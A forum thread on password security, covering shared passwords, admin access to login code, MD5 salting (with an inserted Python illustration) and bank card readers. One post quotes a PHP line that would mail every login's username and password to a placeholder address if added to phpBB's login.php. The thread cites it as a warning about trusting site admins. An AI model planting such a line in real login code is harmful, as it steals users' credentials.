Network Security 101

VibroAxe

Junior Administrator
Ok guys,

as I have just proved to traxata, never give your password out over the internet, even if it's to someone you know and trust(ed). By being given trax's password I was able to reboot his router, change the password, remote control and change the password on his Windows machine, and could have proceeded to make considerably more of a nuisance of myself.

My point here is, even if you think who you're talking to is someone you know, never give your password over the internet. If you HAVE to give it out at all, then find a way to confirm who they are!!

Wol

In Cryo Sleep
Never:

1) trust a site admin who has access to the source of the website. Anyone who has FTP access to the THN server could easily get all of our passwords, I'd say. (It's on line 59 of http://www.phpxref.com/xref/phpbb/login.php.source.html where you stick "mail('your.email@your.domain', 'password for ' . $username, $password);" !)
2) use TeamSpeak authentication. Anyone with access to the server where it's kept can see the lovely txt file where the passwords are kept.... unencrypted (this might have changed, but this is the state TS was in a couple of years back)
3) run a piece of software that someone sends you, no matter what the reason for it might be. Compile it from scratch if they're willing to give you the source code, and if you can compile it. You never know what crap they've innocently put into it :p.
4) fsck up the window focus, and accidentally type your password into an MSN window rather than a login box... :cool:

Site-specific passwords are always a good one too, so having "WolIsAGodT", the T standing for THN. Say for Ebuyer it would be "WolIsAGodE", so the pass changes per site but is easily remembered. So in Vib/Trax's case Vibs may have had "TraxFailzR", R for router, but wouldn't have had "TraxFailzC", with the C for computer (vague example, but you get the gist).

Ronin Storm

Administrator
Staff member
As a by the by, all passwords for the THN Games board are stored encrypted (MD5 hashed I believe) so THN Server Ops actually can't see your password even if they have access to the database. This is common, though not universal, practice in systems of this type.

That said, with access to the PHP source it would be easy enough to modify the code to write the provided passwords into a text file in the clear. You just trust that we don't do that and that we've taken reasonable precautions to protect your data.

On running software sent by others, it is simply not practical to compile everything you are sent, especially in a world with so much closed source proprietary software. This is a game of "know your source", I feel.

Haven

Administrator
Staff member
1) trust a site admin who has access to the source of the website.

Aww feel the love ... *wanders off to buy shinies with Wol's bank details* :P

Ashya

Active Member
As a by the by, all passwords for the THN Games board are stored encrypted (MD5 hashed I believe) so THN Server Ops actually can't see your password even if they have access to the database. This is common, though not universal, practice in systems of this type.

Well, the Exiles (WoW guild) once locked me out of a website I ran and hosted for them by changing all the passwords. But I fished them out, and used an MD5 unhasher I found on the internet to retrieve the password. And I am a total idiot concerning hacking and stuff.

Ronin Storm

Administrator
Staff member
That's probably because they don't use a salt in their passwords. vBulletin does, using a two-pass MD5 hash, the second pass including a user-specific salt. This means that there's no string in the database that can just be unhashed.
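
As an added illustration of the salt point above (example code, not from this thread and not vBulletin's own code): an "MD5 unhasher" of the kind Ashya used is essentially a precomputed table of md5(candidate) values, so it recovers a plain md5(password) directly, but it cannot contain md5(md5(password) + salt) when the salt is a per-user random value. The md5(md5(password) + salt) layout, the wordlist and the salt length are assumptions made for the demo.

```python
import hashlib
import secrets
from typing import Dict, Iterable, Optional, Tuple

# Constructed wordlist for the demo; an "unhasher" site precomputes
# md5() of a far larger list, but the mechanism is the same.
WORDLIST = ["password", "letmein", "TraxFailzR", "WolIsAGodT", "hunter2"]


def md5_hex(data: str) -> str:
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def build_lookup_table(words: Iterable[str]) -> Dict[str, str]:
    """Precomputed single-pass table: md5(word) -> word."""
    return {md5_hex(w): w for w in words}


def unsalted_hash(password: str) -> str:
    """What a board storing plain md5(password) keeps in its database."""
    return md5_hex(password)


def salted_two_pass_hash(password: str, salt: str) -> str:
    """Two-pass scheme as described in the post, assumed here to be
    md5(md5(password) + salt) with a per-user salt stored beside the hash."""
    return md5_hex(md5_hex(password) + salt)


def reverse_with_table(stored_hash: str, table: Dict[str, str]) -> Optional[str]:
    """The 'unhasher': a dictionary lookup, nothing more."""
    return table.get(stored_hash)


def demo(password: str = "TraxFailzR") -> Tuple[Optional[str], Optional[str]]:
    table = build_lookup_table(WORDLIST)
    # Unsalted: the stored string is exactly one of the precomputed keys.
    recovered_plain = reverse_with_table(unsalted_hash(password), table)
    # Salted: the stored string depends on a random per-user salt, so a
    # table built only from candidate passwords can never contain it.
    salt = secrets.token_hex(3)  # constructed per-user salt
    recovered_salted = reverse_with_table(salted_two_pass_hash(password, salt), table)
    return recovered_plain, recovered_salted
```

The salt only defeats precomputed tables; because MD5 is fast and the salt sits next to the hash, weak passwords can still be guessed one user at a time, which is the case Wol describes next.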
 

Wol

In Cryo Sleep
Using several passes of MD5 is usually pretty good. However, I've seen some where the MD5 reverser has happily got the password back *sigh*.

Oh, and Haven, my passwords and info used for banking are different to my usual forum logins, so it'll delay you a bit ;-)

Traxata

Junior Administrator
You have a password for online banking?!

I have some chip reader from Barclays that asks you for your PIN, then gives you an 8-digit code to log into the site with. You have to input on the keyboard your username, the last 4 digits of the card used and the 8-digit code provided by the "Pin Sentry".

Wol

In Cryo Sleep
Yeah. I know Barclays and Nationwide have started doing the distributed chip and PIN devices, and possibly other banks too. It's based loosely upon the RSA SecurID system; however, that just has a continual seed which is updated each minute, and doesn't require a PIN to be entered each time (look it up on Wikipedia; it's like a little keyfob thing).

To log in online, I have to provide my customer number, a piece of memorable information which I've set, and 3 digits from a 6-digit passkey which I've set. The card number isn't used at all during login. And then to start transferring money, you have to have the card reader, to authenticate that you really do want to transfer money to some dodgy bloke called "Trax" :p

Wol

In Cryo Sleep
*wonders if thn is set up to automatically join 2 messages by the same user*

You also have the Verified by Visa thing, so that if people are trying to use my card to buy stuff, they'll also need a password for that! All very clever.